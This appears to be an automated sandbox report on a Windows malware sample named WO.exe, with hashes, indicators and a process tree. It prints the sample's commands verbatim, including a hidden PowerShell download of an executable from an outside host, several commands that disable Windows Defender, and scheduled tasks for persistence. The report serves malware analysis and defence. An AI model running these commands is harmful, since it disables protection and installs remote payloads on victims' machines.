Analysis
-
max time kernel
121s -
max time network
128s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
23-12-2024 18:51
Static task
static1
Behavioral task
behavioral1
Sample
WO.exe
Resource
win7-20241010-en
General
-
Target
WO.exe
-
Size
126KB
-
MD5
7176b040816932541eb9c2b91d90b29b
-
SHA1
137a9c4620366caff2a1d1c297b6ae8c6d28761d
-
SHA256
db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95
-
SHA512
1332645e8c6b53994b4f3f28b980c1fe646cec1771e77982a85ec4036725f4f2930bd9a45caea8a03b8a8ece0b432955b0d55e09396f5a80fd7c0d2825b0d1de
-
SSDEEP
3072:a2sMWkzbJh1qZ9QW69hd1MMdxPe9N9uA0hu9TBfcX011:7bJhs7QW69hd1MMdxPe9N9uA0hu9TBZn
Malware Config
Extracted
https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Blocklisted process makes network request 6 IoCs
flow pid Process 5 2736 powershell.exe 6 2736 powershell.exe 8 584 powershell.exe 9 584 powershell.exe 11 2300 powershell.exe 12 2300 powershell.exe -
pid Process 2244 powershell.exe 2872 powershell.exe 2416 powershell.exe 2736 powershell.exe 584 powershell.exe 2300 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 872 WO.exe 748 WO.exe -
Loads dropped DLL 1 IoCs
pid Process 2000 taskeng.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 108 sc.exe 3068 sc.exe 2248 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2616 schtasks.exe 2780 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2244 powershell.exe 2736 powershell.exe 2872 powershell.exe 584 powershell.exe 2416 powershell.exe 2300 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 2244 powershell.exe Token: SeDebugPrivilege 2736 powershell.exe Token: SeDebugPrivilege 2872 powershell.exe Token: SeDebugPrivilege 584 powershell.exe Token: SeDebugPrivilege 2416 powershell.exe Token: SeDebugPrivilege 2300 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1664 wrote to memory of 1636 1664 WO.exe 30 PID 1664 wrote to memory of 1636 1664 WO.exe 30 PID 1664 wrote to memory of 1636 1664 WO.exe 30 PID 1636 wrote to memory of 2244 1636 cmd.exe 32 PID 1636 wrote to memory of 2244 1636 cmd.exe 32 PID 1636 wrote to memory of 2244 1636 cmd.exe 32 PID 1636 wrote to memory of 2736 1636 cmd.exe 33 PID 1636 wrote to memory of 2736 1636 cmd.exe 33 PID 1636 wrote to memory of 2736 1636 cmd.exe 33 PID 1636 wrote to memory of 2724 1636 cmd.exe 34 PID 1636 wrote to memory of 2724 1636 cmd.exe 34 PID 1636 wrote to memory of 2724 1636 cmd.exe 34 PID 1636 wrote to memory of 2668 1636 cmd.exe 35 PID 1636 wrote to memory of 2668 1636 cmd.exe 35 PID 1636 wrote to memory of 2668 1636 cmd.exe 35 PID 1636 wrote to memory of 2616 1636 cmd.exe 36 PID 1636 wrote to memory of 2616 1636 cmd.exe 36 PID 1636 wrote to memory of 2616 1636 cmd.exe 36 PID 1636 wrote to memory of 2684 1636 cmd.exe 37 PID 1636 wrote to memory of 2684 1636 cmd.exe 37 PID 1636 wrote to memory of 2684 1636 cmd.exe 37 PID 1636 wrote to memory of 2780 1636 cmd.exe 38 PID 1636 wrote to memory of 2780 1636 cmd.exe 38 PID 1636 wrote to memory of 2780 1636 cmd.exe 38 PID 1636 wrote to memory of 3068 1636 cmd.exe 39 PID 1636 wrote to memory of 3068 1636 cmd.exe 39 PID 1636 wrote to memory of 3068 1636 cmd.exe 39 PID 1636 wrote to memory of 2664 1636 cmd.exe 40 PID 1636 wrote to memory of 2664 1636 cmd.exe 40 PID 1636 wrote to memory of 2664 1636 cmd.exe 40 PID 2664 wrote to memory of 2480 2664 net.exe 41 PID 2664 wrote to memory of 2480 2664 net.exe 41 PID 2664 wrote to memory of 2480 2664 net.exe 41 PID 1636 wrote to memory of 1612 1636 cmd.exe 42 PID 1636 wrote to memory of 1612 1636 cmd.exe 42 PID 1636 wrote to memory of 1612 1636 cmd.exe 42 PID 1636 wrote to memory of 2520 1636 cmd.exe 43 PID 1636 wrote to memory of 2520 1636 cmd.exe 43 PID 1636 wrote to memory of 2520 1636 cmd.exe 43 PID 2000 wrote to memory of 872 2000 taskeng.exe 45 PID 2000 wrote to memory of 872 2000 taskeng.exe 45 PID 2000 wrote to memory of 872 2000 taskeng.exe 45 PID 872 wrote to memory of 1912 872 WO.exe 46 PID 872 wrote to memory of 1912 872 WO.exe 46 PID 872 wrote to memory of 1912 872 WO.exe 46 PID 1912 wrote to memory of 2872 1912 cmd.exe 48 PID 1912 wrote to memory of 2872 1912 cmd.exe 48 PID 1912 wrote to memory of 2872 1912 cmd.exe 48 PID 1912 wrote to memory of 584 1912 cmd.exe 49 PID 1912 wrote to memory of 584 1912 cmd.exe 49 PID 1912 wrote to memory of 584 1912 cmd.exe 49 PID 1912 wrote to memory of 2440 1912 cmd.exe 50 PID 1912 wrote to memory of 2440 1912 cmd.exe 50 PID 1912 wrote to memory of 2440 1912 cmd.exe 50 PID 1912 wrote to memory of 2128 1912 cmd.exe 51 PID 1912 wrote to memory of 2128 1912 cmd.exe 51 PID 1912 wrote to memory of 2128 1912 cmd.exe 51 PID 1912 wrote to memory of 2292 1912 cmd.exe 52 PID 1912 wrote to memory of 2292 1912 cmd.exe 52 PID 1912 wrote to memory of 2292 1912 cmd.exe 52 PID 1912 wrote to memory of 2248 1912 cmd.exe 53 PID 1912 wrote to memory of 2248 1912 cmd.exe 53 PID 1912 wrote to memory of 2248 1912 cmd.exe 53 PID 1912 wrote to memory of 2232 1912 cmd.exe 54 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 2724 attrib.exe 2440 attrib.exe 1548 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\WO.exe"C:\Users\Admin\AppData\Local\Temp\WO.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1FB1.tmp\1FB2.tmp\1FB3.bat C:\Users\Admin\AppData\Local\Temp\WO.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2736
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"3⤵
- Views/modifies file attributes
PID:2724
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditLogon"3⤵PID:2668
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "RunRedditLogon" /tr "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe" /sc onlogon /rl highest /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:2616
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditMinute"3⤵PID:2684
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "RunRedditMinute" /tr "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe" /sc minute /mo 1 /rl highest /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:2780
-
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:3068
-
-
C:\Windows\system32\net.exenet stop WinDefend3⤵
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:2480
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1612
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2520
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {BCB75E38-A5E2-482D-86DE-939356DE7140} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exeC:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:872 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FB6F.tmp\FB70.tmp\FB71.bat C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:584
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"4⤵
- Views/modifies file attributes
PID:2440
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditLogon"4⤵PID:2128
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditMinute"4⤵PID:2292
-
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled4⤵
- Launches sc.exe
PID:2248
-
-
C:\Windows\system32\net.exenet stop WinDefend4⤵PID:2232
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WinDefend5⤵PID:1164
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵PID:1288
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2588
-
-
-
-
C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exeC:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe2⤵
- Executes dropped EXE
PID:748 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E4B4.tmp\E4B5.tmp\E4B6.bat C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"3⤵PID:1820
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2300
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"4⤵
- Views/modifies file attributes
PID:1548
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditLogon"4⤵PID:1364
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditMinute"4⤵PID:1040
-
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled4⤵
- Launches sc.exe
PID:108
-
-
C:\Windows\system32\net.exenet stop WinDefend4⤵PID:892
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WinDefend5⤵PID:2276
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵PID:884
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2528
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5c0e9bc2dfff6e08df8196809b9bbf253
SHA1006e88ea359145c40a6bbca55e6f21b387999255
SHA25643c1dfafac6c340f420057606f317c2d0d3182c04f1a9c76b782f818c85f4f11
SHA5125b0c012aca5479bf3b8852e1504465ccb2ad6ce4134ee8d2ad57c898fd91ac19f96a669ebc3a9201e65099ed1723f4515b48ca25ea21681ad45377ce3d9ca60c
-
Filesize
126KB
MD57176b040816932541eb9c2b91d90b29b
SHA1137a9c4620366caff2a1d1c297b6ae8c6d28761d
SHA256db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95
SHA5121332645e8c6b53994b4f3f28b980c1fe646cec1771e77982a85ec4036725f4f2930bd9a45caea8a03b8a8ece0b432955b0d55e09396f5a80fd7c0d2825b0d1de
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5e6130968fb6a047d82c1586bdc5e1e5c
SHA1c548e763f9349271538d21564946562fef98340b
SHA256bbdbc7320fe02dc6a5c49e06da14e430191510e4b131f5396855cacf2df49cb3
SHA512e00ca8084139f180535696fdf40020aae9b8b0d324e178f22be96e0d3de3177880d35e8760b15cc70719ab74cacba4c7c9390159c60348ecb8ac1f4678621cce